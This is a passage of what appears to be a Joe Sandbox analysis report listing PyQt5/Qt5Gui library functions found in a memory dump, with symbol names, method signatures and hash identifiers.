                                                                                                                                                                                                                                          • ?indexFromItem@QStandardItemModel@@QEBA?AVQModelIndex@@PEBVQStandardItem@@@Z.QT5GUI ref: 00007FF89D950140
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?indexFromIndex@@ItemItem@Item@@@ModelModel@@malloc
                                                                                                                                                                                                                                          • String ID: BJ8$QStandardItemModel$indexFromItem$indexFromItem(self, item: Optional[QStandardItem]) -> QModelIndex
                                                                                                                                                                                                                                          • API String ID: 1084473625-2898275337
                                                                                                                                                                                                                                          • Opcode ID: c8cb885396bc997ed47266581ea1d422ade61b61111c77cb459d426517ebc97e
                                                                                                                                                                                                                                          • Instruction ID: 4cd515384561af24c67a061af1287fe7c05675b91fd3f3fd29d755973b89d23c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cb885396bc997ed47266581ea1d422ade61b61111c77cb459d426517ebc97e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4711F637A18E46C5EB109F25E8896A933A5FB48FC4F914032DA8E47320EF3DE559D744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rotatedVector@QQuaternion@@QEBA?AVQVector3D@@AEBV2@@Z.QT5GUI ref: 00007FF89D9B3FF0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rotatedQuaternion@@V2@@Vector3Vector@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QQuaternion$rotatedVector$rotatedVector(self, vector: QVector3D) -> QVector3D
                                                                                                                                                                                                                                          • API String ID: 3025245369-297908399
                                                                                                                                                                                                                                          • Opcode ID: 016eac8f9af578e5c3cc1893eb6a1b0a21ca2e76d021840929731104c8723a4c
                                                                                                                                                                                                                                          • Instruction ID: 60dd4c614cde6936f31c99ec922b451c215747dac8f8e523c5111d5df3866c4d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 016eac8f9af578e5c3cc1893eb6a1b0a21ca2e76d021840929731104c8723a4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D110437A19A46C1EB109F21E8896A933E5FB48FC4F914036DA8E47324EF3DE959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?subtracted@QRegion@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D979DE9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?subtracted@Region@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QRegion$subtracted$subtracted(self, r: QRegion) -> QRegion
                                                                                                                                                                                                                                          • API String ID: 2522316622-1595466212
                                                                                                                                                                                                                                          • Opcode ID: b3050e84b70f8b991f91c9ae3cb8f176689861578f1b2798e05f93add30a7ef1
                                                                                                                                                                                                                                          • Instruction ID: 5d310f27425e053c242708076ac04f14a279311baa1c711da365673f013fb19c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3050e84b70f8b991f91c9ae3cb8f176689861578f1b2798e05f93add30a7ef1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44110436A18A4681EB109F25E8892A933E5FB44FC0F914036DA8E47320EF3DE959C748
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?united@QPainterPath@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D9ABE59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?united@PainterPath@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$united$united(self, r: QPainterPath) -> QPainterPath
                                                                                                                                                                                                                                          • API String ID: 987900539-531114823
                                                                                                                                                                                                                                          • Opcode ID: 9f567e214a0b18a0e7bb0a21812fdbd784bd49fa995d17ec9562f848c1108bf7
                                                                                                                                                                                                                                          • Instruction ID: 297af23dc20684bd662ea801c5e36ae115c4acfd3b1168d85a843d6bcbec805f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f567e214a0b18a0e7bb0a21812fdbd784bd49fa995d17ec9562f848c1108bf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0112337A08A4682EB10DF15E8896A933A5FB44B90F914036CA8E03320EF39E959C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?subtracted@QPolygonF@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D931FF9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?subtracted@PolygonV1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPolygonF$subtracted$subtracted(self, r: QPolygonF) -> QPolygonF
                                                                                                                                                                                                                                          • API String ID: 4426677-3230020821
                                                                                                                                                                                                                                          • Opcode ID: 4922172345a4479c70acc091e18e4ba280ae5181ab2e273d0bcc3e4d112f2741
                                                                                                                                                                                                                                          • Instruction ID: d4368cc6d176b7ebc7feb0abd0469fcf3ea682ee69803dc122234c53404f7154
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4922172345a4479c70acc091e18e4ba280ae5181ab2e273d0bcc3e4d112f2741
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64110437A18A46C1EB109F61E8896A933E5FB44FC0F914036DA8E07320EF3DE959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeItem@@Rows@Standard
                                                                                                                                                                                                                                          • String ID: Bii$QStandardItem$removeRows$removeRows(self, row: int, count: int)
                                                                                                                                                                                                                                          • API String ID: 3935922224-2605227661
                                                                                                                                                                                                                                          • Opcode ID: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                                          • Instruction ID: 7ea12d504a421806217ca3dfd1483e67ed155919e71a65aa4a285cbd12aaeaf2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C311D476A18F46D1EB10CF15E8896A933A4FB44B84F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?insertColumns@Table@@Text
                                                                                                                                                                                                                                          • String ID: Bii$QTextTable$insertColumns$insertColumns(self, pos: int, num: int)
                                                                                                                                                                                                                                          • API String ID: 1320599217-1414679935
                                                                                                                                                                                                                                          • Opcode ID: c2e79ab330085aa936466265586938288323ce5024fb888fadea8fc43e718cbf
                                                                                                                                                                                                                                          • Instruction ID: 8a579f9317991f273005a29e1c4df6d186fbf9ef9ceb9413e84aaf1c83587166
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2e79ab330085aa936466265586938288323ce5024fb888fadea8fc43e718cbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911D476A18E46D5EB108F11E8896A933A5FB48BC4F914132DA9E03320EF39E95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?markContentsDirty@Document@@Text
                                                                                                                                                                                                                                          • String ID: Bii$QTextDocument$markContentsDirty$markContentsDirty(self, from_: int, length: int)
                                                                                                                                                                                                                                          • API String ID: 4280019181-3993341970
                                                                                                                                                                                                                                          • Opcode ID: c1873b4b8f10b66a46508ea7acb5dace1b28583fbb4be53eb1e166910a366976
                                                                                                                                                                                                                                          • Instruction ID: 666e813881b8fe2a2d2a5b2bab42286b6354162190ae75d8e45eb496bd829a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1873b4b8f10b66a46508ea7acb5dace1b28583fbb4be53eb1e166910a366976
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6911E636A18F46D1EB10DF11E8896A933B4FB48B94F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?elementBool_Count@FromLongPainterPath@@
                                                                                                                                                                                                                                          • String ID: QTextFormat$isEmpty$isEmpty(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3302664181-1918454510
                                                                                                                                                                                                                                          • Opcode ID: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                                          • Instruction ID: 81d8f5ad7208571a6be1bd77add458739c0ec806999e9bfa7de865ab5e2bbf8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12014037B09B46C1EB109F61E8895A933E4FB44BD0B854032DD9E47220EF78F5A9C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-2203707715
                                                                                                                                                                                                                                          • Opcode ID: 539d9a6b73d84f98c8ce6d1a88dde6d57cd4b261c6690ce56c5711ae50d42f25
                                                                                                                                                                                                                                          • Instruction ID: 13cb21608b80621e91fb94157095fd53b514a5f0e05ccd55b85838310dd852a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 539d9a6b73d84f98c8ce6d1a88dde6d57cd4b261c6690ce56c5711ae50d42f25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52014037A08A4682EB10CF60E8894A933E4FB44FD5B954032D99E47260EF7CE5A9C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?mergeCharFormat@QTextCursor@@QEAAXAEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FF89D95FAF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharText$?mergeCursor@@Format@Format@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextCursor$mergeCharFormat$mergeCharFormat(self, modifier: QTextCharFormat)
                                                                                                                                                                                                                                          • API String ID: 748513923-2286667590
                                                                                                                                                                                                                                          • Opcode ID: 586f634dc4f6d9b7bd72a6ee47e4bac3596031ed4dda38829d3eabed8fb44904
                                                                                                                                                                                                                                          • Instruction ID: fd2d345dbc907ff1e32ac5822d6c197ef6566aedbc18f8b9170fceddd2278ffd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586f634dc4f6d9b7bd72a6ee47e4bac3596031ed4dda38829d3eabed8fb44904
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66111336A08E46D1EB109F15E8892A933A8FB48FD4F914032DA9E03320EF3DE55AC304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setTextOption@QTextLayout@@QEAAXAEBVQTextOption@@@Z.QT5GUI ref: 00007FF89D94FE13
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setLayout@@Option@Option@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextLayout$setTextOption$setTextOption(self, option: QTextOption)
                                                                                                                                                                                                                                          • API String ID: 3098923699-862581115
                                                                                                                                                                                                                                          • Opcode ID: a6fca749f5d39738b8f0310dade832657181aaeba41cee4f0bce66baddabda21
                                                                                                                                                                                                                                          • Instruction ID: 9ccefaa557d48ca44a12ed4e42508ff79c9cf3d5f41077ebe952b614533cb593
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fca749f5d39738b8f0310dade832657181aaeba41cee4f0bce66baddabda21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311F836A18E46D1EB109F15E8896A933A5FB44FD4F914132DA9E03320EF3DE565C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBoundingPicture@@Rect@Rect@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPicture$setBoundingRect$setBoundingRect(self, r: QRect)
                                                                                                                                                                                                                                          • API String ID: 2345466796-2038282140
                                                                                                                                                                                                                                          • Opcode ID: 2127798c431d714f199f14e366681d12e358c0a55805a5042f077a76d2e13ac3
                                                                                                                                                                                                                                          • Instruction ID: 5b1611d7143e1ac6c208ddccd9b2e7750a5d3e2d66242c1bde2ab8b73432910d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2127798c431d714f199f14e366681d12e358c0a55805a5042f077a76d2e13ac3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3711E636A19E46D1EB109F15E8896A933A5FB44FD4F914032DA8E03320EF3DE569C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextFormat$isListFormat$isListFormat(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-1176197936
                                                                                                                                                                                                                                          • Opcode ID: 8ce7ffcb860e064197296368c241edf88cb2c6abdb4beb8bed427b08cf5ab7a9
                                                                                                                                                                                                                                          • Instruction ID: 1027c8ee1feb07d8b743b59aba9058ac9aabadcd306c8476099f30c4676fe626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ce7ffcb860e064197296368c241edf88cb2c6abdb4beb8bed427b08cf5ab7a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8014037A09A46D6EF10CF61E8894A973E4FB44BD0B954432D99E47220EF78E5A9C348
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setBlockFormat@QTextCursor@@QEAAXAEBVQTextBlockFormat@@@Z.QT5GUI ref: 00007FF89D960143
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockText$?setCursor@@Format@Format@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextCursor$setBlockFormat$setBlockFormat(self, format: QTextBlockFormat)
                                                                                                                                                                                                                                          • API String ID: 2824883670-3426317795
                                                                                                                                                                                                                                          • Opcode ID: f9875d61abb51eb14a511625b5e7c6cd7a1748e73225f2acd8ac14943a0132de
                                                                                                                                                                                                                                          • Instruction ID: a349c69e9a339a063263c45bf78d29d3f39a35f76aa3dc07a0a09710e7c1425c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9875d61abb51eb14a511625b5e7c6cd7a1748e73225f2acd8ac14943a0132de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511F576A18E46C1EB109F15E8896A933A5FB48FC4F914132DA9E07324EF3DE55AC304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?remove@Block@@@List@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextList$remove$remove(self, a0: QTextBlock)
                                                                                                                                                                                                                                          • API String ID: 4255931918-2132397891
                                                                                                                                                                                                                                          • Opcode ID: c2828cc1d25fc1f5f3752c5497427228a7080d422fdbb3adc6184925a87d68ba
                                                                                                                                                                                                                                          • Instruction ID: 346a64df8b592a7970fe38d854d01e0b4d185667a9624ce28397375c18d948f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2828cc1d25fc1f5f3752c5497427228a7080d422fdbb3adc6184925a87d68ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11E336A18E46D1EB109F15E8896A933E5FB58FD4F914132DA9E03320EF39E56AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setFormat@Format@@@Object@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextFrame$setFrameFormat$setFrameFormat(self, aformat: QTextFrameFormat)
                                                                                                                                                                                                                                          • API String ID: 760775155-3067798299
                                                                                                                                                                                                                                          • Opcode ID: 325ac8385bd670796d8adf2026465da6fe5e21c439983ee377eb3ce463e77a58
                                                                                                                                                                                                                                          • Instruction ID: d6d167e75f1cebc83860c5d6b4c86fbf9236e9cbf7ed552faedae6a7fb924a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 325ac8385bd670796d8adf2026465da6fe5e21c439983ee377eb3ce463e77a58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB112836A08E46D1EB108F11E8892A933A4FB48FD4F918132DA8E03320EF3DE559C304
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-2682830596
                                                                                                                                                                                                                                          • Opcode ID: 8be7567d6aeaa8c82e197bf4ae38ff4995b56f0ffbe5621d844142ea3aeb76e2
                                                                                                                                                                                                                                          • Instruction ID: 22edbb24b3443b6a2a3520a6813d79280d071dcb977d3fbfd9d762351c8cabc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be7567d6aeaa8c82e197bf4ae38ff4995b56f0ffbe5621d844142ea3aeb76e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C015277A08B46D6EB108F61E8894A833E4FB44BD1F954436D99E43320EF7CE5A9C348
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setExp@Exp@@@Validator@@
                                                                                                                                                                                                                                          • String ID: BJ9$QRegExpValidator$setRegExp$setRegExp(self, rx: QRegExp)
                                                                                                                                                                                                                                          • API String ID: 3356541571-3763716425
                                                                                                                                                                                                                                          • Opcode ID: 37da44a2e83e9dff6ed763b1fff7517bd5a533788049bfe57ef39d8f22ad346f
                                                                                                                                                                                                                                          • Instruction ID: 916047b85a6f3b0744b4f164aa43b7497c66d3c569a8d90b6f11551e6d9fbb5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37da44a2e83e9dff6ed763b1fff7517bd5a533788049bfe57ef39d8f22ad346f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F811E636A18F46D1EB109F15E8896A933E5FB48F94F914032DA9E03320EF3DE959C304
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?swap@Region@@V1@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$swap$swap(self, other: QPainterPath)
                                                                                                                                                                                                                                          • API String ID: 2712419754-3530485660
                                                                                                                                                                                                                                          • Opcode ID: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                                          • Instruction ID: d2920d96193e2c97200d77c5571e1eb6caabdacbdae567266d0bc588894ba080
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C11F576A08E46D1EB10CF10E8896A933A5FB54B94F914032DA9E03320EF39E559C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$columns$columns(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-34484938
                                                                                                                                                                                                                                          • Opcode ID: 3292b3ee0fdc8a68880832a713d931a83d389c49d9603d63e04182419a762b9b
                                                                                                                                                                                                                                          • Instruction ID: 4f3bc8a71897aed2b90eec1b704c7cdb91ca9548425844a7ccfb3f5e3ea2877f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3292b3ee0fdc8a68880832a713d931a83d389c49d9603d63e04182419a762b9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1012D76A08B46D1EB109F61E8496A933E4FB44B94F914032D98E43364EF7DE599C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBool_Enabled@FromGrabKeyboardLongWindow@@
